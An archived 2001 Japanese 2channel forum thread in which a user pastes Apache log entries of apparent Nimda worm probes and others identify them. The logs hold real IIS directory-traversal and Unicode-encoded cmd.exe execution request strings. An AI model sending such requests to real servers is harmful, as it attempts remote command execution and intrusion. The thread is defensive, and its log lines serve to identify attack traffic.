■ 2ちゃんねるは、ここのサーバを使ってるです。。。
 .jp ドメインお持ちのお客様大歓迎。maido3.jp
 .fm 取得代行します。(US) maido3.fm
 .ca 取得代行します。(US) maido3.ca
 .com .net .org 取得代行します。(US) maido3.com
 .cc .to .tv 取得代行はじめました。NEW
 人気サイト
月々1,000円からの BinboServer.com 2ちゃんねるも使っている Big-Server.com
>> 2ちゃんねる、サーバ監視所

■掲示板に戻る■ ■過去ログ倉庫めにゅーに戻る■
最近、こんなの来ます、、、
1 名前: かるぴすうぉ〜た〜 投稿日: 01/09/21 03:56
最近、こんなのがよく来ます。
なんか故意にやっているのではなく、定期的になんらかのソフトを使ってやっているようです。
404と出ているので、被害がでているようには見えないのですが、やはりヘンなログが残ると不気味です。
これ、なんでしょう?

fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 334
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 332
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:34 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:34 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 356
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:34 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:34 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:34 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 389
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:35 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:35 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:35 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:35 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:36 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:36 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:36 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 356
fla1aae052.stm.mesh.ad.jp - - [21/Sep/2001:03:48:36 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 356

apacheのログより。


2 名前: 名無しさん@お腹いっぱい。 投稿日: 01/09/21 04:02
かるぴすうぉ〜た〜 さん。
■ 初心者用質問スレッド Part III ■
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000914322
で質問するとやさしく教えてくれるとおもいます。
単発の質問スレはマナー違反なので誰もまともに教えてくれないですよ。
「本来ここは情報交換の場であって、一方的に「教えて」という人が来るべき場所ではない。
でもあまりに質問に来る人が多いから、親切な人が質問用のスレッドをつくって、
いわばボランティアで、情報交換の片手間に答えてくれてる。
そんな状況下でさらにスレッド立てちゃう神経がわからん。 」
ということです。


3 名前: 名無しさん@お腹いっぱい。 投稿日: 01/09/21 04:04
今話題のNimdaですね。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301&st=856&to=856&nofirst=true

以後はこちらのスレでどうぞ...
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617&ls=50


4 名前: かるぴすうぉ〜た〜 投稿日: 01/09/21 04:07
あ、これが最近話題のNimdaだったんですか、すみません、知識不足で。
さげてください、すみませんでした。


5 名前: 名無しさん@お腹いっぱい。 投稿日: 01/09/21 04:07
* ママ〜 2chでスレたてたよ〜
 \__  ______
      ∨    ∧_∧
           " ,  、 ミ   / ̄ ̄ ̄ ̄ ̄
            ゝ∀ く  < 悪いね、みんなを困らせて
           ∧_∧  |   \_____
        三  (    とノ
      三   /   つ |
     三  _ ( _  /|  |
        (_ソ(_ソ(_ )


2ちゃんねるは、ここのサーバを使ってるです。。。